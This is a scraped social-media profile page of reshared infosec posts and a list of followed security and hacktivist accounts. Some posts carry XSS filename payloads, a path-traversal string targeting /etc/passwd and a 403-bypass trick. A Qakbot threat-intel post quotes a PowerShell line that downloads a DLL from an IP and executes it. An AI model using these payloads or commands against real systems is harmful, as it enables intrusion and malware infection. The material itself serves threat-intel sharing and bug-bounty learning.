Nikt0 @Nikto_APT
Joined December 2022-
Tweets34
-
Followers7
-
Following197
-
Likes32
Since I’ve first seen an interactive “OpSec safety consideration” warning in Sliver C2, I’ve been looking forward to an opportunity to implement something similar in a project of mine. Well, that day has come I believe 😂
we are happy to share a 0day we have found on wordpress login page allow un-auth cross site scripting (xss) #BugBountytip #BugBounty #ItTakesACrowd
Need a full AD lab with 20 windows servers +Kali+win logging+sysmon+splunk to test attack techniques and review the resulting telemetry ? Attack Range has your covered in ~30m ⌨️python attack_range.py build Config🔗gist.github.com/mvelazc0/77013… Attack Range 🔗 github.com/splunk/attack_…
Played with Outlook CVE-2023-23397. Made a simple PoC email builder & sender featuring malicious reminder (just a Msg, no need to use a Task or Cal. Ev.). Critical 0-click account takeover on internal networks even after MS patch, no need to open the message on the victim side.
#opendir Just example of course😎
#opendir hosting #metasploit #meterpreter payloads and other tooling 109.205.180[.]99 rev.elf uses 109.205.180[.]99:4242 for C2 r (bash reverse shell) connects back to 173.212.248[.]30:4242 ref.elf: 587329be27b4e35c334b7e6fe77b5dff r: 83492b5878b83a7889d56faaaa16597b
Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817) · GitHub - gist.github.com/monoxgas/f6155…
Bypass 403 Forbidden using @httpie http --print=Hh "https://domain.tld/path/to/WWW/admin/desktop/excite/results.con" to http --print=Hh "https://domain.tld/path/to/WWW/admin/desktop/excite/results.conf%2f"
How to find SQL injection on the Registration page? Try SQL Injection in Email Address (username) #bugbountytips #bugbounty #bugbountytips #sqli
/api/file/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
#Emotet OneNote New Wave Started 🚨 #TTPs & #DFIR Exec Flow: OneNote.exe > Wscript.exe > Regsvr32.exe [+] JavaScript T1059.007: .js [ServerXMLHTTP + SaveToFile + IWshShell3] [+] Regsvr32 T1218.010: .dll exec from %temp%/[RandomDir] #IOCs C2 Server: 209.126.85[.]32 Port: 8080
#Qakbot - obama245 - .html > .js > ps > .dll wscript cFV.js powershell $Poly = ("http://203.96.177.121/lJkDbdp.dat") foreach ($doc in $Poly) {try {Invoke-WebRequest $doc -O $env:TEMP\Withertip.dll rundll32 $env:TEMP\Withertip.dll,GL70 IOC's github.com/pr0xylife/Qakb…
(1/2) Four part series on IoT devices reverse engineering by Federico Dotta Discover components and ports: security.humanativaspa.it/a-journey-into… Firmware dump and analysis: security.humanativaspa.it/a-journey-into… #iot #reverseengineering #embedded #infosec #cybersecurity
#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png credit:@h4x0r_dz
TOP15 Best Vulnerability Scanners 🎯 #BugBounty #BugBountytips #BugBounty #nuclei #hacking
We're hosting an Open Port event in our offices in London and you can be there! 🫵 👨💻 Hack with fellow bug bounty hunters 💼 Meet the Intigriti team! 📅 March 23, 2023 👨👩👦 Total spots available: 15 Want to join? Check out all the information below 👇 See you there! 👋
Yay, I was awarded a $10,000 bounty on @Hacker0x01! For a Critical Severity IDOR. Tip: 1) In-depth knowledge of the program, lots of manual testing 2) Learning to master the 'Autorize' extension for Burp Automated & manual testing🤝 #bugbountytip #hackerone

🦇 @0x786f73697072
100 Followers 871 Following
[N]🏴☠️ @NyuSecurity
1K Followers 2K Following ~#Defacer ~#AntiSec ~ #Hacktivista #Cyberpunk 🏴☭ |EJPT☠EWPT| 🐾 | النار على البنوك #HackThePlanet
HulkGoSmash @Hulk_Go_Smash
8 Followers 212 Following
eScan AV @escan_tweet
18K Followers 11K Following eScan’s product portfolio encompasses a varied range of products that helps end-users battle with the malicious transmogrify that splurges from the internet.
Emre @CyberEm8
4 Followers 125 Following
Abdullah Nawaf (Hacke... @XHackerx007
8K Followers 441 Following Hackerx007 Bug hunter FB/Twitter/Mail.ru HOF 41 Bugcrowd rank 11 Bugcrowd P1 rank with 226 p1 :) In love with P1 ;)
👑 OFJAAAH 👑 @ofjaaah
19K Followers 510 Following Bug Hunter ☣ | Hi I Hacker spare time and not spare time too 🧙♂️. https://t.co/ob6h7VO9uC
XSS Payloads @XssPayloads
52K Followers 0 Following
Nagli @galnagli
39K Followers 482 Following Hacker; Head of Threat Exposure at @wiz_io 🧙♂️; Bug Bounty Hunter; Live Hacking Events Winner
James Kettle @albinowax
80K Followers 94 Following Director of Research at @PortSwigger aka @Burp_Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
@mikko @mikko
229K Followers 934 Following Researcher and a best-selling author. Keynote talks at RSA, Black Hat & DEF CON. TED Speaker. Chief Research Officer at Sensofusion.
mdowd @mdowd
32K Followers 746 Following Internet Hacker. Founder of @vigilant_labs. Previously, co-founder of Azimuth Security (now L3Harris Trenchant)
SwiftOnSecurity @SwiftOnSecurity
405K Followers 9K Following computer security person. former helpdesk.
lcamtuf @lcamtuf
38K Followers 497 Following Substack: https://t.co/yFvmNisGW3 Homepage: https://t.co/iFAXZxCO5H
Greg Linares (Laughin... @Laughing_Mantis
37K Followers 2K Following 20+ yrs in Infosec. Malware Influencer. I turn Malware into Art and Music. Art @MalwareArt. 4x Pwnie Nominee. 𝕍𝕏. GameDev. Autistic.
Adam Chester 🏴�... @_xpn_
36K Followers 501 Following Hacker for Hire at @SpecterOps | Blog at https://t.co/tjfTOllCEu | Insta at https://t.co/PqR6CZPwjl
MalwareTech @MalwareTechBlog
277K Followers 1 Following Not here anymore. Profiles: https://t.co/sFoOuGmYK2
str0ke @str0ke
3K Followers 198 Following
InformNapalm @InformNapalm
59K Followers 579 Following International Volunteer Community. Founded in 2014. #OSINT, #HUMINT & #CYBINT research, analysis, verification of information, translation into 10+ languages
David J. Malan @davidjmalan
125K Followers 112 Following I teach @CS50. Gordon McKay Professor of the Practice of Computer Science, Harvard University, [email protected]. Verify at https://t.co/NGJZ2KGgTc.
ƍHOᏕT3ȜΟΙ @_gHOST3301_
3K Followers 8 Following ●Cicada3301 ●GhostSec ●#Cicada3301 ●#GhostSec ●#Anonymous ●I'mNotQ ●gHOSTNetworksLLC ●IntelExchange ●StrategicIntelligenceNetwork ●How Will You Tell The World?
YourAnonWolf @YourAnonWolf_
365 Followers 42 Following #GhostSec #SiegedSec 🌽 im secretly a furry UwU
CyberK @kpwnsystem
78 Followers 23 Following #KonTop #GhostSec K is Allways on top Pwnn3d since 2018
Anonymous @YourAnonNews
7.7M Followers 878 Following We are Anonymous, we are legion, we do not forgive, we do not forget. Expect us. Here to counter propaganda and un-fuck your mind!
GhostSec @ghost_s3curity
6K Followers 23 Following Official #GhostSec • #HackThePlanet • #GSM #Anonymous • #OpIran ▪ #GhostSecMafia
Anonymous🏴 @Parrattarna
106K Followers 757 Following We are #Anonymous, we are legion, we do not forgive, we do not forget. Expect us. #Anonyinfo #opIran #OpIsIs #OpTurkey #OccupyGezi So.We Are Still Here!
Black Block @valkanestor
25K Followers 334 Following Social and digital activism. 🏴 Hack parts @bodilaykof @blackblockv #OpIran #Rojava #BlackBlock #Anonymous Bluesky: https://t.co/TbnR0TxzHz.
Anonymous News 🌐 @Anonymous_Link
95K Followers 8K Following We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us! Shared account Palestine/USA/Spain #OpIsrael #OpIran #OpRussia #OpMyanmar
Anonymous TV 🇺🇦 @YourAnonTV
507K Followers 380 Following We are #Anonymous, an internet-based international collective from all around the world | Get the latest updates on global conflicts and Anonymous Ops
Anonymous🐾🐈�... @YourAnonRiots
142K Followers 3K Following In the name of all #digital warriors, we warriors promise to participate in the #Anonymous. #HackThePlanet #infoSec #CyberSecurity & #AnonNews #AnonОps
Anonymous OpIran @anonymousopiran
157K Followers 296 Following We Are Anonymous, We Don't Forget, We Don't Forgive, Expect Us! We stand with Iranian Freedom Fighters #OpIran #MahsaAmini #مهسا_امینی
Anonymous @pwmipotent
26K Followers 657 Following cybersecurity researcher | he/him | tweets and opinions expressed are my own views and they do not reflect my employer
Dream @dreamsecuri
268 Followers 165 Following ~s̲ᴜ̲ᴄ̲ᴄ̲ᴇ̲s̲s̲ғ̲ᴜ̲ʟ̲ʟ̲ʏ̲ ᴇ̲x̲ᴘ̲ʟ̲ᴏ̲ɪ̲ᴛ̲ᴇ̲ᴅ̲~ -#fucksociety #fuckgov #Opchildsafety #Oppedogate #freedom-
[N]🏴☠️ @NyuSecurity
1K Followers 2K Following ~#Defacer ~#AntiSec ~ #Hacktivista #Cyberpunk 🏴☭ |EJPT☠EWPT| 🐾 | النار على البنوك #HackThePlanet
HHackBoyz @HackBoyz3
25 Followers 12 Following Siamo ritornati, profilo bannato a 4k di follower. We are back, profile banned from 4k followers. #justice #cyberwar #hacktivism #silent #world #OpRevengeGram.
🅔🅡🅡🅞🅡_... @ERR0R_HB
78 Followers 46 Following Cyb3r Drag0nz / ByteBlitz Team member & co-founder https://t.co/d4HG1GLdKY
ahhhhfs @abskoop
731K Followers 1K Following ❤️虚假推友🫶🫰😘💕 收集分享各种互联网垃圾|投稿侵权请私信|谢谢不接推|TG频道订阅更新:https://t.co/OmSvNms9yl |小号:@ahhhhfs l🔔重复刷无相关评论会被拉黑|链接打不开用Chrome浏览器,不要用国产浏览器
Ptrace Security GmbH @ptracesecurity
58K Followers 867 Following Empowering IT Security Professionals through Hands-On Online Courses.
payloadartist @payloadartist
43K Followers 284 Following Yapping about AI, AppSec, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my cat's • Part-time shitposter
Anton @therceman
26K Followers 798 Following 👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💰 📖 Bug Bounty Book - https://t.co/Y9nGrZydBV
Florian Roth ⚡️ @cyb3rops
207K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
Clandestine @akaclandestine
50K Followers 5K Following | Security | Osint | Threat Research | Opsec | Threat Intelligence | Infosec | Threat Hunting | Humint |
nixCraft 🐧 @nixcraft
386K Followers 624 Following Love Linux/Unix, open source, and programming? Into Sysadmin & DevOps? Follow us! Boost your IT career with daily new tools, apps, and humor ⤵️
MD Sagor Hossain (Pro... @bughuntar
12K Followers 69 Following Security Researcher @Hacker0x01 | CVE-2024-37402 Owner | Google Hall of Fame Rank 1st (Bangladesh) | Cybersecurity Enthusiast | Known as Professor the Hunter
Ryan M. Montgomery @0dayCTF
103K Followers 613 Following Pentester / Serial Entrepreneur / Child Safety Warrior — https://t.co/9c4DBWMYiQ
HackGit @hack_git
55K Followers 2 Following The channel was created for cybersecurity specialists 🥷 → Open Source Software → RedTeam → BugBounty → etc 🍻 https://t.co/0PYtBpfJ4f